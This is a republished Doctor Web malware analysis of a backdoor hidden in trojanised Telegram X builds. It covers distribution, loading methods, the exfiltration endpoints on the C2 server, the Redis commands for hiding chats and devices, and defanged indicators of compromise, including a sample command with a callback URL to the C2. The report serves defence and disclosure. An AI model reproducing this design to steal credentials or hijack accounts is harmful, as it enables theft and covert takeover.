hendryadrian.com

hendryadrian.com

October 23, 2025

Doctor Web has identified a dangerous backdoor, Android.Backdoor.Baohuo.1.origin, in maliciously modified versions of the Telegram X messenger. In addition to being able to steal confidential data, including user logins and passwords, as well as chat histories, this malware has a number of unique features. For example, to prevent itself from being detected and to cover up the fact that an account has been compromised, Android.Backdoor.Baohuo.1.origin can conceal connections from third-party devices in the list of active Telegram sessions. Moreover, it can add and remove the user from Telegram channels and also join and leave chats on behalf of the victim, also concealing these actions. In fact, with this backdoor’s assistance, malicious actors gain full control over the victim’s account and the messenger functionality, while the trojan itself is a tool for boosting the number of subscribers in Telegram channels. Cybercriminals control the backdoor in different ways, one of which is via the Redis database; such a control mechanism is something that has not been seen previously in Android threats. According to our experts’ estimates, the number of devices infected with Android.Backdoor.Baohuo.1.origin has exceeded 58,000.

Android.Backdoor.Baohuo.1.origin started being distributed back in mid-2024, as evidenced by earlier modifications found during its analysis. The main method for delivering this backdoor to target devices is through in-app ads in mobile programs. Potential victims are shown ads that encourage them to install the Telegram X messenger. When clicking on such banners, users are redirected to malicious websites from which the trojan APK file is downloaded.

These sites are designed to look like an app catalog, while the messenger itself is positioned on them as a platform for conveniently finding a partner for communication and dating. This is indicated by banners with overlaid advertizing text about “free video chats” and invitations to “talk” (for instance, disguised as screenshots of the video call window) as well as by reviews from supposedly happy users that the threat actors actually composed. It should be noted that these webpages have functionality for selecting the displayed language, but the images themselves do not change.

One of the malicious sites from which the trojan version of Telegram X is downloaded. Potential victims are offered the chance to install an app where, according to “reviews”, it is easy to find a partner for communication and dating

Currently, cybercriminals have prepared standard templates with banners in only two languages—Portuguese, for users from Brazil, and Indonesian. Thus, Brazilian and Indonesian audiences are the main target for the attackers. At the same time, it is possible that over time, the threat actors’ interest will extend to users from other countries.

Studying the attackers’ network infrastructure allowed us to determine the scale of their activity. On average, Doctor Web’s malware analysts observe about 20,000 active connections of Android.Backdoor.Baohuo.1.origin. At the same time, the total number of infected devices has exceeded 58,000. Around 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers have been infected.

Countries with the highest number of devices infected with Android.Backdoor.Baohuo.1.origin (according to Doctor Web’s anti-virus laboratory)

However, malicious websites are not the only source for Android.Backdoor.Baohuo.1.origin’s distribution. Our experts have also detected it in third-party app catalogs, including APKPure, ApkSum, and AndroidP. Additionally, in the APKPure app store, the malware is posted on behalf of the official messenger developer, despite the fact that the digital signatures of the original version and the trojan modification are different. We have notified the online platforms where the trojanized versions of Telegram X were found.

The modified Telegram X with Android.Backdoor.Baohuo.1.origin implanted in it was distributed through APKPure on behalf of the messenger’s genuine developer

Doctor Web’s anti-virus laboratory discovered several Android.Backdoor.Baohuo.1.origin variations, which can be conditionally divided into 3 main modification groups:

• versions where the threat actors embedded the backdoor into the main executable DEX file of the messenger;
• versions where the backdoor is dynamically loaded in the form of a patch into the executable DEX file using the LSPatch tool;
• versions where the backdoor is located in a separate DEX file in the app’s resources directory and loaded dynamically.

Regardless of the modification type, Android.Backdoor.Baohuo.1.origin initializes when the messenger is launched. The messenger itself remains functional, and for users it looks like a regular program. In reality, however, malicious actors have complete control over it through the backdoor and can even alter the logic of its operation.

When cybercriminals need to perform an action that does not require interfering with the app’s main functionality, they use pre-prepared “mirrors” of the necessary messenger methods. For example, mirrors can be used to display phishing messages in windows that look indistinguishable from real Telegram X windows.

Methods are separate blocks of code in the structure of Android programs that are responsible for performing certain tasks.

If the action is not standard for the messenger, then the Xposed framework is used. It directly changes a certain functionality of the app via dynamic method modification. In particular, it can be used to hide certain chats and authorized devices as well as to steal the clipboard contents.

The main difference between the earlier versions of the malicious program and the current ones is in how the malware is controlled. Older versions communicated with cybercriminals and received commands from them via a C2 server, which is a traditional channel. However, over time, malware writers added to Android.Backdoor.Baohuo.1.origin the ability to receive additional commands that come from the Redis database, thus expanding its functionality. At the same time, they also provided for the duplication of new commands through a regular C2 server in case the database becomes unavailable. This is the first known case of using Redis to control Android malware.

When launched, Android.Backdoor.Baohuo.1.origin connects to the initial C2 server to download a configuration that, among other parameters, contains data to connect to Redis. Through this database, threat actors not only send specific commands to the malicious app but also update the trojan’s settings. For example, they assign current addresses for the C2 server and the NPS server. Malware writers use the latter to connect infected devices to their internal network (intranet) and turn them into a proxy for accessing the Internet.

Android.Backdoor.Baohuo.1.origin regularly connects to the C2 server via API requests and can receive the following tasks:

• upload incoming SMS and contacts from the infected device’s phonebook to the C2 server;
• upload the contents of the clipboard to the C2 server when minimizing the messenger and restoring its window;
• receive URLs from the C2 server to display ads, as well as the server address from which the trojan’s update in the form of a DEX file will be downloaded;
• receive encryption keys that are used when certain data is uploaded to the C2 server (for instance, the clipboard contents);
• request a group of commands for collecting information about installed apps, the message history, and contacts from the device’s phonebook, and about the devices logged into Telegram (this request is executed every 30 minutes);
• request an URL from the C2 server to download an update for Telegram X;
• request from the C2 server a configuration which is then saved as a JSON file;
• request information about the Redis database;
• upload information about the device to the C2 server whenever messenger network activity is detected;
• receive from the C2 server a list of bots that are to be added to the Telegram contact list;
• upload the following information to the C2 server every 3 minutes: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;
• every minute, request commands in the same format as the commands from the Redis database.

To receive commands via Redis, Android.Backdoor.Baohuo.1.origin connects to the attackers’ corresponding server where it registers its own sub-channel. Threat actors connect to this sub-channel and post tasks in it, which the backdoor then executes. The malicious program can receive the following commands:

• create a blacklist of chats that will not be displayed in the Telegram X window;
• conceal specified devices from the user in the list of authorized devices for their account;
• block notifications from blacklisted chats for a specified time;
• display a window with information about the Telegram X messenger update (when the user clicks it, they are redirected to a target website);
• send the C2 server information about all of the installed apps;
• terminate the user’s current authorized Telegram login session on the infected device;
• display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);
• remove the Telegram Premium icon in the app’s interface for the current user;
• upload to the C2 server information from the Telegram X databases that store chat history, messages, and other confidential data;
• subscribe the user to a specified Telegram channel;
• leave a specified Telegram channel;
• join a specified Telegram channel on behalf of the user, using the provided URL;
• obtain the list of devices authorized in Telegram;
• request the user’s authentication token and upload it to the C2 server.

It should be noted that hijacking data from the clipboard (when the user minimizes the messenger and restores its window) allows various scenarios for stealing confidential data to be implemented. For example, the victim can copy the password or mnemonic phrase used to access their crypto wallet, copy text from some important document to send it to business partners, etc. The trojan will intercept this information from the clipboard and send it to the malicious actors.

Dr.Web Security Space for mobile devices successfully detects and deletes all known versions of Android.Backdoor.Baohuo.1.origin, so this malware does not pose a threat to our users.

More details about Android.Backdoor.Baohuo.1.origin
Indicators of compromise

Android.Backdoor.Baohuo.1.origin

Added to the Dr.Web virus database: 2025-08-01

Virus description added: 2025-10-23

sha1:

• 4410f69099a037a25e5976df04a91cee7dbfac14 (org.thunderdog.challegram)

Description

A backdoor for Android-based devices. Threat actors embedded it into a copy of the original version of the Telegram X messenger. It executes the attackers’ commands and allows them to steal victims’ confidential data and gain full control over their Telegram accounts. Android.Backdoor.Baohuo.1.origin is distributed through malicious websites and has also been detected in some third-party Android app catalogs.

Operating routine

There are several Android.Backdoor.Baohuo.1.origin versions, which differ in how they are implanted into the Telegram X app. These are the main modification types:

• the backdoor is imbedded into the main executable DEX file of the messenger;
• the backdoor, in the form of a patch, is dynamically injected into the main executable DEX file using the LSPatch tool;
• the backdoor is located in the app’s resources directory as a separate DEX file and is loaded dynamically.

In all of the modifications, the call for the malicious code initialization method is located in the class ApplicationLoader, which lets Android.Backdoor.Baohuo.1.origin run as soon as the messenger launches. At the same time, the original app remains functional and appears harmless to the user.

Interaction with Telegram X

Android.Backdoor.Baohuo.1.origin can alter Telegram X’s functionality at the code level using the Xposed framework and mirrors of the messenger’s methods that the malicious actors have prepared. When the backdoor needs to perform an action that is not standard for the program (like concealing certain chats and authorized devices in its interface), it uses a framework that dynamically changes the functionality of the methods.

If the action does not require intervention in the app’s logic, it uses the mirrors alone.

An example of a mirror:

com.ucreator.tgjar.reflect.mirror.org.telegram.tgnet.TLRPC.TL_inputChannel

To call a required method, Android.Backdoor.Baohuo.1.origin forms its name using the following algorithm.

1. The mirror package name that comes after mirror is read (for the example listed earlier, the result will be org.telegram.tgnet);
2. The name of the mirrored class is read (for the example above the result will be TLRPC.TL_inputChannel);
3. The final name is returned using the mirror’s method getName() by adding the second string to the first one: org.telegram.tgnet.TLRPC.TL_inputChannel.

Next, using reflection, the object of this method is created (the method is called).

The controlling mechanism

Commands are sent to the backdoor in two ways:

• via the C2 server;
• via the Redis database.

Earlier Android.Backdoor.Baohuo.1.origin versions were controlled only via the C2 server.

The commands and responses to them are sent in JSON format.

Android.Backdoor.Baohuo.1.origin has a built-in configuration with various parameters, including the addresses for:

• the C2 server;
• the Redis database;
• the NPS server.

When launched, the backdoor receives an updated configuration from the current C2 server. It then uses this configuration to connect to the attackers’ Redis database. Upon successfully connecting to the database, the trojan receives the current C2 server and NPS server addresses.

HTTP and HTTPS protocols are used to communicate with the C2 server and the NPS server.

The NPS server

The NPS server is used to connect infected devices to the attackers’ internal network (intranet), which allows these devices to be used as a proxy for accessing Internet and redirect traffic. The network is based on the project https://github.com/ehang-io/nps, and a corresponding client side is added to the backdoor.

To launch the NPS client, Android.Backdoor.Baohuo.1.origin sends a request to sdk-nps[.]ips5[.]info to get a configuration with the parameters required to connect to the NPS server. At the time of the analysis, the backdoor did not connect to the server and only received a test configuration:

{
"msg": "u64cdu4f5cu6210u529f",
"authKey": "TestAuthKey",
"password": "123456",
"code": 0,
"port": "8090",
"ip": "172[.]10.10[.]10",
"user": "user"
}

The C2 server

The backdoor communicates with the C2 server (hpncallback[.]gold5play[.]com) via API calls. Through them, it sends the collected data to the malicious actors and informs them when commands have been executed successfully. The following API calls are used:

• /api/AppCallback/SMS — to upload incoming SMS to the C2 server;
• /api/AppCallback/Contacts — to upload user phonebook contacts to the C2 server;
• /api/Callback/EncryptionData — to upload the clipboard contents to the C2 server when the messenger is minimized and returned to its window (the method onResume of the app is hooked to track this event);
• /api/Callback/GetLoadParams — to obtain an URL from the C2 server in order to display ads and to obtain the server address for downloading the trojan’s update in the form of a DEX executable file;
• /api/Callback/GetSecretKey — to obtain encryption keys that are used when certain data is uploaded to the C2 server (for example, the clipboard contents);
• /api/Callback/TgCheckReportDataCallback — to request a group of commands for collecting information about installed apps, message history, and contacts from the device’s phonebook, and about devices logged into Telegram (this request is performed every 30 minutes);
• /api/Callback/TgCheckUpdateApp — to request an URL from the C2 server to download an update for Telegram X. When the update is installed, /api/Callback/TgInstallEventCallback is called to report on the task’s successful execution;
• /api/Callback/TgKeepAliveStrategyCallback — to request from the C2 server a configuration that is then saved as a JSON file. For example: {"switch1":false,"switch2":false,"switch3":true,"switch4":true,"switch5":false,"intervalTime":3 0} The trojan only uses the intervalTime variable, which determines how much time must pass before the configuration is requested again;
• /api/Callback/TgRedisStatusChange — to request information about the Redis database;
• /api/Callback/TgRegisterPropertyCallback — to upload device information to the C2 server (executed whenever the messenger sends network packets);
• /api/Xcallback/GetRobots — to obtain a list of bots that are then added to the Telegram contacts list;
• /api/callback/TgHeartCallback — it is called every 3 minutes to upload the following data to the C2 server: the current app’s permissions, the device’s state (whether its screen is on or off, whether the app is active), and the mobile phone number with the name and password for the Telegram account;
• /api/callback/TgGetTask — it is called every minute to request a command in the same format as the commands from Redis.

Control via Redis

To receive commands via Redis, Android.Backdoor.Baohuo.1.origin connects to the attackers’ corresponding server (159[.]138.237[.]10:33619), where it registers its own sub-channel linked to the infected device. Malicious actors connect to this sub-channel and post tasks in it, which are then executed by the backdoor. The following commands are supported:

• /tg/hideChats/setBlackList and /tg/hideChats/getBlackList — create the blacklist for chats that will not be displayed to the user in the Telegram X interface;
• /tg/hideDevice/setDeviceBlackList and /tg/hideDevice/getDeviceBlackList — conceal specified devices from the user in the list of authorized devices for their account;
• /tg/serviceNotifications/startBlock and /tg/serviceNotifications/queryBlock — block notifications from the blacklisted chats from the list setBlackList for a specified time;
• /tg/dialog/showUpdateApp — display a window with information about the Telegram X update (when users click it, they are redirected to a targeted website);
• /tg/query/allPackages — upload information about all installed programs to the C2 server;
• /tg/terminated/session — terminate the user’s current authorized Telegram session on the infected device;
• /tg/dialog/showInstallApp — display a window with information about the Telegram X app update, where the user is asked to install an APK file (if the file is missing, the trojan downloads it first);
• /tg/hidePremium/setFlag and /tg/hidePremium/getFlag — to remove the Telegram Premium icon in the app’s interface for the current user;
• /tg/db/queryContactsByUsers — upload to the C2 server information from the Telegram X database that stores user contacts;
• /tg/db/queryDialogsByChats — automatically upload to the C2 server information from the Telegram X database that stores message history;
• /tg/db/messagesStorageRawQuery — in accordance with the SQL queries specified in the command, upload to the C2 server information from the Telegram X database that stores message history;
• /tg/channel/join — subscribe the user to a specified Telegram channel;
• /tg/channel/leaveChannel — leave a specified Telegram channel;
• /tg/channel/addByLink — join a specified Telegram channel on behalf of the user, using the provided URL;
• /tg/settings/getDevices — obtain the list of devices authorized in Telegram;
• /tg/captcha/token — request a user authentication token and upload it to the C2 server.

An example of the command:

{"cmd":20000,"path":"/tg/captcha/token","serial_no":"5228e35ac6834e57856a230e507b4b94","callback":"hxxps[:]//hpncallback[.]gold5play[.]com/api/callback/TgCommandCallback","param":{"key_id":"6LflQ8EqAAAAAE3JaczP-gBVVObsFsSe2U7yZJ6O","action":"signup","currentAccount":0,"resultType":0}

If the value of the cmd variable differs from 20000, the command will not be executed.

The value of the serial_no variable represents the command’s serial number that is saved before its execution. If a command with such a number has been received before, the flag duplicate is set, and the corresponding information is uploaded to the C2 server via the API call /api/callback/TgReceptionCommandCallback, together with information about the device. Thus, this variable is used to report that the backdoor has successfully received the task.

The value of the variable path is the command name. Each command is linked to a certain class; depending on this name, the backdoor uses the required class.

The value of the variable param is a JSON object with the parameters for an object of the required class.

The value of the variable callback is the server address to which the packet reporting on the command’s successful execution will be sent.

MITRE matrix

Source: https://news.drweb.com/show/?i=15076